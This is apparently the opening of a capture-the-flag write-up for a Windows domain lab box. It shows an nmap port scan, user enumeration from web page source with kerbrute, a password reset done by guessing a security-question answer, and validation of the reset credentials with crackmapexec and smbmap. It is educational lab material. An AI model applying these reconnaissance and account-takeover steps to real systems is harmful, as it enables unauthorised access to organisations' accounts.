nmap 10.10.110.170 -p- -sS -sV
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-04-11 16:48:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
5223/tcp open ssl/jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
5229/tcp open jaxflow?
5262/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
5263/tcp open ssl/jabber
5269/tcp open xmpp Wildfire XMPP Client
5270/tcp open ssl/xmpp Wildfire XMPP Client
5275/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
5276/tcp open ssl/jabber
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
7070/tcp open http Jetty 9.4.18.v20190429
7443/tcp open ssl/http Jetty 9.4.18.v20190429
7777/tcp open socks5 (No authentication; connection failed)
9090/tcp open zeus-admin?
9091/tcp open ssl/xmltec-xmlmail?
9389/tcp open mc-nmf .NET Message Framing
49670/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
We have a large number of ports open on the target system. Firstly we are going to take a look at port 80.
Part way down the page we find some employee information.
Viewing the page source we see a list of usernames.
From the source we also pick up the FQDN of fire.windcorp.thm.
Running the discovered usernames against kerbrute reveals some are valid users accounts.
A further look through the main web page shows an opportunity to reset user passwords based on a security questions.
As we know Lily's username from the page source, we can also answer her secret questions as the page source for her profile image is named "LilyleandSparky.jpg".
After entering the relevant information we are given a new password for the user lilyle.
Which, when testing with crackmapexec confirms the credentials are valid.
Using smbmap with lily's account we some readable shares.
